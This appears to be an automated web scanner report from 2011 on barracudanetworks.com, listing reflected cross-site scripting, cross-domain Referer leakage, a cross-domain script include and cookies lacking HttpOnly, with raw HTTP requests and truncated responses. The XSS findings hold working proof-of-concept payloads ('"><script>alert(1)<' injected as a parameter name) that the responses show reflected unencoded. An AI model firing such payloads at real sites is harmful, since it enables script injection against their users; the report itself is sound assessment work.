1. Cross-site scripting (reflected)
1.1. http://www.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]
1.2. http://www.barracudanetworks.com/ns/ [name of an arbitrarily supplied request parameter]
2. Cross-domain Referer leakage
3. Cross-domain script include
4. Cookie without HttpOnly flag set
4.1. http://www.barracudanetworks.com/
4.2. http://www.barracudanetworks.com/ns/
Severity: | High |
Confidence: | Certain |
Host: | http://www.barracuda |
Path: | / |
GET /?a=bsf_product&1c422"><script>alert(1)< Host: www.barracudanetworks.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive |
HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: barra_tracking_code=bsf Set-Cookie: locale=+; expires=Wed, 18-May-2011 22:58:39 GMT Set-Cookie: locale=country_code%0Aus Set-Cookie: barra_hidden_menus=a%3A0 Date: Wed, 18 May 2011 23:06:59 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... <input type="hidden" name="1c422"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.barracuda |
Path: | /ns/ |
GET /ns/?a=bsf_product&L=en&473b5"><script>alert(1)< Host: www.barracudanetworks.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: barra_tracking_code=bsf |
HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: barra_tracking_code=bsf Set-Cookie: locale=+; expires=Wed, 18-May-2011 22:58:27 GMT Set-Cookie: locale=country_code%0Aus Set-Cookie: barra_hidden_menus=a%3A0 Date: Wed, 18 May 2011 23:06:46 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... <input type="hidden" name="473b5"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.barracuda |
Path: | /ns/ |
GET /ns/?a=bsf_product&L=en HTTP/1.1 Host: www.barracudanetworks.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: barra_tracking_code=bsf |
HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: barra_tracking_code=bsf Set-Cookie: locale=+; expires=Wed, 18-May-2011 22:57:57 GMT Set-Cookie: locale=country_code%0Aus Set-Cookie: barra_hidden_menus=a%3A0 Date: Wed, 18 May 2011 23:06:16 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://www.cudatel ...[SNIP]... <li><a href="http://www.cudaeye ...[SNIP]... <div style="float: right; margin: 0 16px 2px;"><a href="https://login ...[SNIP]... <li class="news"> <a href="http://www ...[SNIP]... <map name="webinar-reg"> <area shape="rect" coords="0,0,300,190" href="http://event.on24 </map> ...[SNIP]... </h1> <a style="font-weight: normal; text-decoration: none;" href="http://www <p> ...[SNIP]... <a href="customers/"><img src="http://www.barracuda <a href="customers/"><img src="http://www.barracuda <a href="customers/"><img src="http://www.barracuda ...[SNIP]... </a> | <a href="http://www | <a href="http://www | <a href="http://www | <a href="http://www | <a href="http://www.cudatel | <a href="http://www.cudaeye ...[SNIP]... <div id="live-chat-loader" style="display: none"> <script type="text/javascript" src="http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.barracuda |
Path: | /ns/ |
GET /ns/?a=bsf_product&L=en HTTP/1.1 Host: www.barracudanetworks.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: barra_tracking_code=bsf |
HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: barra_tracking_code=bsf Set-Cookie: locale=+; expires=Wed, 18-May-2011 22:57:57 GMT Set-Cookie: locale=country_code%0Aus Set-Cookie: barra_hidden_menus=a%3A0 Date: Wed, 18 May 2011 23:06:16 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... <div id="live-chat-loader" style="display: none"> <script type="text/javascript" src="http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.barracuda |
Path: | / |
GET /?a=bsf_product HTTP/1.1 Host: www.barracudanetworks.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive |
HTTP/1.1 301 OK Content-Length: 182 Content-Type: text/html Location: http://www.barracuda Set-Cookie: barra_tracking_code=bsf Set-Cookie: locale=+; expires=Wed, 18-May-2011 22:57:57 GMT Set-Cookie: locale=country_code%0Aus Date: Wed, 18 May 2011 23:06:16 GMT <head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="http://www |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.barracuda |
Path: | /ns/ |
GET /ns/?a=bsf_product&L=en HTTP/1.1 Host: www.barracudanetworks.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: barra_tracking_code=bsf |
HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: barra_tracking_code=bsf Set-Cookie: locale=+; expires=Wed, 18-May-2011 22:57:57 GMT Set-Cookie: locale=country_code%0Aus Set-Cookie: barra_hidden_menus=a%3A0 Date: Wed, 18 May 2011 23:06:16 GMT Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.barracuda |
Path: | /ns/js/wysiwyg/wysiwyg.js |
GET /ns/js/wysiwyg/wysiwyg.js Host: www.barracudanetworks.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.barracuda Cookie: barra_tracking_code=bsf |
HTTP/1.1 200 OK Cache-Control: max-age=86400 Content-Type: application/x-javascript Last-Modified: Wed, 20 May 2009 20:16:11 GMT Accept-Ranges: bytes ETag: "e4e49cd187d9c91:18c3" Date: Wed, 18 May 2011 23:06:21 GMT Vary: Accept-Encoding Content-Length: 34315 // // openWYSIWYG v1.0 Copyright (c) 2006 openWebWare.com // This copyright notice MUST stay intact for use. // // An open source WYSIWYG editor for use in web based applications. // For full sou ...[SNIP]... ption : Emulates insertAdjacentHTML(), insertAdjacentText() and insertAdjacentElement() three functions so they work with Netscape 6/Mozilla Notes : by Thor Larholm me@jscript.dk \* ------------------------- if(typeof HTMLElement!="undefined" && !HTMLElement.prototype HTMLElement.prototype ...[SNIP]... |